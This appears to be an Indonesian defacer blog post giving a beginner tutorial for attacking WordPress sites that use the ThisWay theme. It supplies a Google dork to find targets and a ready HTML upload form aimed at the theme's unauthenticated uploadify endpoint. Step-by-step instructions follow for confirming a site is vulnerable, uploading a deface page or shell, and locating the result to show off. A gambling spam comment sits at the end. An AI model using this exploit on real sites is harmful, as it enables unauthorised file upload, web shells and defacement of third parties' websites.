Hello fans ku afik lovers, haters ku, kamu ku :*
kali ini guai mau share tutor deface plugin wordpress-themes-thisway
sebenernya ini teknik lama hmm tapi gpp eaaa ?? yang udah expert minggir dulu
ini buat newbie oke ??
langsung aja ea ????
BAHAN :
1. DORK : inurl:/wp-content/themes/ThisWay/ (kembangin eaaaa beb )
2. CSRF :
<form
action="http://target.co.li/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="UPLOAD">
</form>
copy csrf nya and simpen dalam extensi html contoh csrf.html
3. exploit :
/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
Langkah
1. dorking gugel dulu
2. pilih salah satu site nya
3.kalo udah masukin exploit di belakang site nya
contoh : target.com/wp-content/themes/ThisWay/includes/uploadify /upload_settings_image.php
4. kalo vuln ada tuisan kek gini : {"status":"NOK", "ERR":"This file is incorect"}
5. nah selanjut nya masukin site nya ke csrf
6. kalo udah buka csrf nya di web browser
7. terus upload deh script / shell /txt mu di sini gua upload sc aja
8. kalo udah muncul nama file yang sudah kita upload tadi
9. lihat hasil nya begini cara lihat hasil deface an kita
target.com/wp-content/uploads/tahun/bulan/namafile.html
10. nah kalo udah muncul script deface kita, copy link nya pamerin deh ke temen2 lo wkwkwkwkwk :v
oke sekian dulu tutor dari gua
special thanks ==>BERANDAL<==
AND I LOVE YOU SOMEONE :*
jangan lupa like fp kami di facebook
kalo bingung bisa lihat video nya disini :
Rupiahtoto Bandar Togel Resmi di Indonesia
BalasHapus